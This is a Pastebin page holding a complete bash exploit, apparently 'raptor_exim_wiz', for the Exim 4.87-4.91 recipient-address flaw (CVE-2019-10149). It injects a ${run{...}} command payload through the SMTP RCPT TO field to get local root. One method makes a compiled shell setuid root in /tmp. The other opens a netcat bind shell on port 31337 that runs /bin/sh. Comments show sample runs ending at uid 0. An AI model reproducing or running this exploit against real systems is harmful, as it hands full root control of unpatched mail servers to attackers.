SHARE
TWEET

Untitled

a guest Jun 19th, 2019 82 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2.  
  3. #
  4. # raptor_exim_wiz - "The Return of the WIZard" LPE exploit
  5. # Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
  6. #
  7. # A flaw was found in Exim versions 4.87 to 4.91 (inclusive).
  8. # Improper validation of recipient address in deliver_message()
  9. # function in /src/deliver.c may lead to remote command execution.
  10. # (CVE-2019-10149)
  11. #
  12. # This is a local privilege escalation exploit for "The Return
  13. # of the WIZard" vulnerability reported by the Qualys Security
  14. # Advisory team.
  15. #
  16. # Credits:
  17. # Qualys Security Advisory team (kudos for your amazing research!)
  18. # Dennis 'dhn' Herrmann (/dev/tcp technique)
  19. #
  20. # Usage (setuid method):
  21. # $ id
  22. # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
  23. # $ ./raptor_exim_wiz -m setuid
  24. # Preparing setuid shell helper...
  25. # Delivering setuid payload...
  26. # [...]
  27. # Waiting 5 seconds...
  28. # -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
  29. # # id
  30. # uid=0(root) gid=0(root) groups=0(root)
  31. #
  32. # Usage (netcat method):
  33. # $ id
  34. # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
  35. # $ ./raptor_exim_wiz -m netcat
  36. # Delivering netcat payload...
  37. # Waiting 5 seconds...
  38. # localhost [127.0.0.1] 31337 (?) open
  39. # id
  40. # uid=0(root) gid=0(root) groups=0(root)
  41. #
  42. # Vulnerable platforms:
  43. # Exim 4.87 - 4.91
  44. #
  45. # Tested against:
  46. # Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
  47. #
  48.  
  49. METHOD="setuid" # default method
  50. PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
  51. PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'
  52.  
  53. # usage instructions
  54. function usage()
  55. {
  56.     echo "$0 [-m METHOD]"
  57.     echo
  58.     echo "-m setuid : use the setuid payload (default)"
  59.     echo "-m netcat : use the netcat payload"
  60.     echo
  61.     exit 1
  62. }
  63.  
  64. # payload delivery
  65. function exploit()
  66. {
  67.     # connect to localhost:25
  68.     exec 3<>/dev/tcp/localhost/25
  69.  
  70.     # deliver the payload
  71.     read -u 3 && echo $REPLY
  72.     echo "helo localhost" >&3
  73.     read -u 3 && echo $REPLY
  74.     echo "mail from:<>" >&3
  75.     read -u 3 && echo $REPLY
  76.     echo "rcpt to:<$PAYLOAD>" >&3
  77.     read -u 3 && echo $REPLY
  78.     echo "data" >&3
  79.     read -u 3 && echo $REPLY
  80.     for i in {1..31}
  81.     do
  82.         echo "Received: $i" >&3
  83.     done
  84.     echo "." >&3
  85.     read -u 3 && echo $REPLY
  86.     echo "quit" >&3
  87.     read -u 3 && echo $REPLY
  88. }
  89.  
  90. # print banner
  91. echo
  92. echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
  93. echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
  94. echo
  95.  
  96. # parse command line
  97. while [ ! -z "$1" ]; do
  98.     case $1 in
  99.         -m) shift; METHOD="$1"; shift;;
  100.         * ) usage
  101.         ;;
  102.     esac
  103. done
  104. if [ -z $METHOD ]; then
  105.     usage
  106. fi
  107.  
  108. # setuid method
  109. if [ $METHOD = "setuid" ]; then
  110.  
  111.     # prepare a setuid shell helper to circumvent bash checks
  112.     echo "Preparing setuid shell helper..."
  113.     echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
  114.     gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
  115.     if [ $? -ne 0 ]; then
  116.         echo "Problems compiling setuid shell helper, check your gcc."
  117.         echo "Falling back to the /bin/sh method."
  118.         cp /bin/sh /tmp/pwned
  119.     fi
  120.     echo
  121.  
  122.     # select and deliver the payload
  123.     echo "Delivering $METHOD payload..."
  124.     PAYLOAD=$PAYLOAD_SETUID
  125.     exploit
  126.     echo
  127.  
  128.     # wait for the magic to happen and spawn our shell
  129.     echo "Waiting 5 seconds..."
  130.     sleep 5
  131.     ls -l /tmp/pwned
  132.     /tmp/pwned
  133.  
  134. # netcat method
  135. elif [ $METHOD = "netcat" ]; then
  136.  
  137.     # select and deliver the payload
  138.     echo "Delivering $METHOD payload..."
  139.     PAYLOAD=$PAYLOAD_NETCAT
  140.     exploit
  141.     echo
  142.  
  143.     # wait for the magic to happen and spawn our shell
  144.     echo "Waiting 5 seconds..."
  145.     sleep 5
  146.     nc -v 127.0.0.1 31337
  147.  
  148. # print help
  149. else
  150.     usage
  151. fi
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top